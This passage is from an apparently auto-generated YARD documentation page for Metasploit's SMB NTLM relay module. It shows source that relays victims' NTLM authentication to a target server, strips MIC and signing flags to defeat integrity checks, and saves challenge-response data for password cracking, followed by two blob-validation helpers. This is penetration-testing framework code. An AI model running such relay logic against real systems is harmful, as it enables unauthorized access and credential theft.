<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Sign: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_has_flag?'>has_flag?</span><span class='lparen'>(</span><span class='symbol'>:SIGN</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>, Seal: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_has_flag?'>has_flag?</span><span class='lparen'>(</span><span class='symbol'>:SEAL</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span>
<span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_and_sign_key_exch_flags'>drop_mic_and_sign_key_exch_flags</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic_and_flags'>do_drop_mic_and_flags</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_only'>drop_mic_only</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic'>do_drop_mic</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>=</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_relay_ntlmssp_type1'>relay_ntlmssp_type1</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='op'>&amp;.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span>
<span class='comment'># Store the incoming negotiation message, i.e. ntlm_type1
</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:incoming_negotiate_message</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span>
<span class='comment'># Store the relay target&#39;s server challenge, as it is used later when creating the JTR hash
</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target_server_challenge</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span>
<span class='id identifier rubyid_relay_result'>relay_result</span>
<span class='comment'># NTLM challenge, which should never be received from a calling client
</span> <span class='kw'>elsif</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type2</span><span class='rparen'>)</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Gss</span><span class='op'>::</span><span class='const'>Provider</span><span class='op'>::</span><span class='const'>Result</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='kw'>nil</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_LOGON_FAILURE</span><span class='rparen'>)</span>
<span class='comment'># NTLM challenge response
</span> <span class='kw'>elsif</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type3</span><span class='rparen'>)</span>
<span class='id identifier rubyid_relayed_connection'>relayed_connection</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relayed_connection</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_info'>info</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Relaying </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_ntlm_version'>ntlm_version</span> <span class='op'>==</span> <span class='symbol'>:ntlmv2</span> <span class='op'>?</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>NTLMv2</span><span class='tstring_end'>&#39;</span></span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>NTLMv1</span><span class='tstring_end'>&#39;</span></span><span class='embexpr_end'>}</span><span class='tstring_content'> type 3 message to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> as </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_and_sign_key_exch_flags'>drop_mic_and_sign_key_exch_flags</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic_and_flags'>do_drop_mic_and_flags</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_only'>drop_mic_only</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic'>do_drop_mic</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>=</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_relay_ntlmssp_type3'>relay_ntlmssp_type3</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_is_success'>is_success</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='op'>&amp;.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_SUCCESS</span>
<span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_end'>on_relay_end</span><span class='lparen'>(</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='label'>identity:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='label'>is_success:</span> <span class='id identifier rubyid_is_success'>is_success</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_is_success'>is_success</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Successfully authenticated against relay target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:incoming_challenge_response</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span>
<span class='ivar'>@listener</span><span class='period'>.</span><span class='id identifier rubyid_on_ntlm_type3'>on_ntlm_type3</span><span class='lparen'>(</span>
<span class='label'>address:</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span>
<span class='label'>ntlm_type1:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:incoming_negotiate_message</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>ntlm_type2:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target_server_challenge</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>ntlm_type3:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:incoming_challenge_response</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>service_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SMB</span><span class='tstring_end'>&#39;</span></span>
<span class='rparen'>)</span>
<span class='ivar'>@listener</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_success'>on_relay_success</span><span class='lparen'>(</span><span class='label'>relay_connection:</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='comma'>,</span> <span class='label'>relay_identity:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='ivar'>@listener</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_failure'>on_relay_failure</span><span class='lparen'>(</span><span class='label'>relay_connection:</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='rparen'>)</span>
<span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_disconnect!'>disconnect!</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Relay against target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed with unknown error</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_LOGON_FAILURE</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Relayed client authentication failed on target server </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_error_code'>error_code</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='period'>.</span><span class='id identifier rubyid_find_by_retval'>find_by_retval</span><span class='lparen'>(</span><span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span>
<span class='kw'>if</span> <span class='id identifier rubyid_error_code'>error_code</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Relay against target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed with unexpected error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Relay against target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed with unexpected error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_error_code'>error_code</span><span class='period'>.</span><span class='id identifier rubyid_name'>name</span><span class='embexpr_end'>}</span><span class='tstring_content'>: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_error_code'>error_code</span><span class='period'>.</span><span class='id identifier rubyid_description'>description</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='period'>.</span><span class='id identifier rubyid_delete'>delete</span><span class='lparen'>(</span><span class='symbol'>:relay_mode</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span>
<span class='comment'># Should never occur
</span> <span class='kw'>else</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_error'>error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Invalid ntlm request</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Gss</span><span class='op'>::</span><span class='const'>Provider</span><span class='op'>::</span><span class='const'>Result</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='kw'>nil</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_LOGON_FAILURE</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
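<div class="method_details ">
<h3 class="signature " id="valid_ntlm_blob?-instance_method">
#<strong>valid_ntlm_blob?</strong>(blob) &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Reports whether <code>blob</code> begins with the eight-byte NTLMSSP signature, <code>&quot;NTLMSSP\x00&quot;</code> (the ASCII text followed by a NUL byte).</p>
<p>Only this prefix is examined. The message type, the field lengths and the rest of the buffer are not checked here, so a passing result identifies the blob as NTLMSSP-framed but does not establish that it is well-formed. Structural parsing is left to <code>Net::NTLM::Message.parse</code>, which the message-handling code earlier on this page calls on the security buffer.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
&mdash;
<div class='inline'><p><code>true</code> if the prefix matches, <code>false</code> if it does not; <code>nil</code> (falsy) when <code>blob</code> is <code>nil</code>, because the call uses safe navigation (<code>&amp;.</code>).</p></div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
142
143
144</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 142</span>
<span class='kw'>def</span> <span class='id identifier rubyid_valid_ntlm_blob?'>valid_ntlm_blob?</span><span class='lparen'>(</span><span class='id identifier rubyid_blob'>blob</span><span class='rparen'>)</span>
<span class='id identifier rubyid_blob'>blob</span><span class='op'>&amp;.</span><span class='id identifier rubyid_start_with?'>start_with?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>NTLMSSP\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>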
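<div class="method_details ">
<h3 class="signature " id="validate_ntlm_blob!-instance_method">
#<strong>validate_ntlm_blob!</strong>(blob) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Raising form of <code>valid_ntlm_blob?</code>: raises when <code>blob</code> does not begin with the NTLMSSP signature and returns <code>nil</code> otherwise.</p>
<p>As with the predicate, only the signature prefix is verified; a blob that passes can still fail later parsing. The message-handling code earlier on this page rescues <code>ArgumentError</code> (together with <code>OpenSSL::ASN1::ASN1Error</code>), logs &quot;Failed to parse incoming NTLM message&quot; and returns, which appears to be how a blob rejected here is reported.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt>ArgumentError</tt>)</span>
&mdash;
<div class='inline'><p>with the message &quot;The NTLM blob found was malformed&quot; when <code>blob</code> is <code>nil</code> or does not start with <code>&quot;NTLMSSP\x00&quot;</code>.</p></div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
146
147
148
149
150</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 146</span>
<span class='kw'>def</span> <span class='id identifier rubyid_validate_ntlm_blob!'>validate_ntlm_blob!</span><span class='lparen'>(</span><span class='id identifier rubyid_blob'>blob</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_valid_ntlm_blob?'>valid_ntlm_blob?</span><span class='lparen'>(</span><span class='id identifier rubyid_blob'>blob</span><span class='rparen'>)</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The NTLM blob found was malformed</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>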
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:05:36 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>